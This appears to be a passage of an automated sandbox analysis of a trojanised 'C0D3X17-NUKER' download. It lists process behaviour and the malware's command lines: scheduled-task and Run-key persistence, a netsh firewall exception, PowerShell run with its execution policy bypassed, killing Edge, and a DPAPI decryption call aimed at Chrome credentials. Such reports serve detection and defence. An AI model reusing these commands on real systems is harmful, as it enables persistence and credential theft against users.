Token: SeUndockPrivilege 4536 WMIC.exe Token: SeManageVolumePrivilege 4536 WMIC.exe Token: 33 4536 WMIC.exe Token: 34 4536 WMIC.exe Token: 35 4536 WMIC.exe Token: 36 4536 WMIC.exe Token: SeDebugPrivilege 2268 powershell.exe Token: SeIncreaseQuotaPrivilege 4536 WMIC.exe Token: SeSecurityPrivilege 4536 WMIC.exe Token: SeTakeOwnershipPrivilege 4536 WMIC.exe Token: SeLoadDriverPrivilege 4536 WMIC.exe Token: SeSystemProfilePrivilege 4536 WMIC.exe Token: SeSystemtimePrivilege 4536 WMIC.exe Token: SeProfSingleProcessPrivilege 4536 WMIC.exe Token: SeIncBasePriorityPrivilege 4536 WMIC.exe Token: SeCreatePagefilePrivilege 4536 WMIC.exe Token: SeBackupPrivilege 4536 WMIC.exe Token: SeRestorePrivilege 4536 WMIC.exe Token: SeShutdownPrivilege 4536 WMIC.exe Token: SeDebugPrivilege 4536 WMIC.exe Token: SeSystemEnvironmentPrivilege 4536 WMIC.exe Token: SeRemoteShutdownPrivilege 4536 WMIC.exe Token: SeUndockPrivilege 4536 WMIC.exe Token: SeManageVolumePrivilege 4536 WMIC.exe Token: 33 4536 WMIC.exe Token: 34 4536 WMIC.exe Token: 35 4536 WMIC.exe Token: 36 4536 WMIC.exe Token: SeDebugPrivilege 408 powershell.exe Token: SeIncreaseQuotaPrivilege 1060 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1040 msedge.exe 5596 msedge.exe 5940 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 748 wrote to memory of 1592 748 msedge.exe 86 PID 748 wrote to memory of 1592 748 msedge.exe 86 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 2420 748 msedge.exe 87 PID 748 wrote to memory of 4512 748 msedge.exe 88 PID 748 wrote to memory of 4512 748 msedge.exe 88 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89 PID 748 wrote to memory of 432 748 msedge.exe 89
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://www.mediafire.com/folder/kkoutc87ykjal/C0D3X171⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffba9c446f8,0x7ffba9c44708,0x7ffba9c447182⤵PID:1592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:22⤵PID:2420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:82⤵PID:432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:12⤵PID:1600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:12⤵PID:5096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:12⤵PID:3176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:12⤵PID:1444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:12⤵PID:1508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:12⤵PID:2292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5024 /prefetch:82⤵PID:1336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5024 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:12⤵PID:4300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:12⤵PID:408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:12⤵PID:5104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:12⤵PID:4356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6036 /prefetch:12⤵PID:4952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:12⤵PID:3128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:12⤵PID:404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:12⤵PID:1688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:12⤵PID:1736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:12⤵PID:984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6904 /prefetch:12⤵PID:2604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6524 /prefetch:12⤵PID:4124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:12⤵PID:4628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2772 /prefetch:12⤵PID:3784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6912 /prefetch:82⤵PID:4472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7144 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4404 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6788 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1040
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3808
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2840
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1664
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\C0D3X17 (123)\" -spe -an -ai#7zMap11193:88:7zEvent287111⤵
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\C0D3X17 (123)\" -spe -an -ai#7zMap29177:88:7zEvent225241⤵
- Suspicious use of AdjustPrivilegeToken
PID:3200
-
C:\Users\Admin\Downloads\C0D3X17 (123)\C0D3X17\C0D3X17-NUKER.exe"C:\Users\Admin\Downloads\C0D3X17 (123)\C0D3X17\C0D3X17-NUKER.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2844 -
C:\Users\Admin\AppData\Roaming\rundl32.exe"C:\Users\Admin\AppData\Roaming\rundl32.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:220
-
-
C:\Users\Admin\AppData\Roaming\Stable_Network.exe"C:\Users\Admin\AppData\Roaming\Stable_Network.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:2896 -
C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txtC:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"3⤵
- System Location Discovery: System Language Discovery
PID:392 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\host.exe"C:\Users\Admin\AppData\Local\Temp\host.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4732 -
C:\ProgramData\GameSDK.exe"C:\ProgramData\GameSDK.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4624 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\ProgramData\GameSDK.exe" "GameSDK.exe" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1536
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\system.dll.exe"C:\Users\Admin\AppData\Local\Temp\system.dll.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
PID:4924 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\3OfSRlVi78.ps1""3⤵PID:984
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\3OfSRlVi78.ps1"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4164 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b5hljjod\b5hljjod.cmdline"5⤵PID:4748
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60EE.tmp" "c:\Users\Admin\AppData\Local\Temp\b5hljjod\CSCB7299D32906E43709E5546B63165B74F.TMP"6⤵PID:2796
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"3⤵PID:1392
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"3⤵PID:1696
-
C:\Windows\system32\taskkill.exetaskkill /IM msedge.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"3⤵PID:1032
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,111,11,152,43,226,32,145,73,137,243,42,18,79,120,126,126,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,241,173,50,248,48,233,4,229,245,201,146,154,115,98,33,115,73,47,145,149,219,0,76,224,75,238,207,77,243,118,177,201,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,36,144,200,68,162,221,179,194,26,103,200,200,85,181,197,147,65,240,114,77,146,124,55,46,108,10,161,238,71,0,78,7,48,0,0,0,156,77,116,228,75,203,177,250,227,93,81,127,228,115,6,183,240,205,136,99,238,243,170,198,71,189,51,118,193,34,101,52,151,58,240,142,129,23,129,118,83,129,205,128,158,223,219,198,64,0,0,0,249,223,58,23,28,104,226,94,161,154,21,121,253,209,176,1,240,233,220,232,89,251,132,38,156,9,151,153,25,81,61,189,122,16,236,108,252,247,143,85,136,120,142,14,33,105,40,81,30,203,46,2,241,141,19,71,126,65,251,155,4,135,68,82), $null, 'CurrentUser')"3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:2308 -
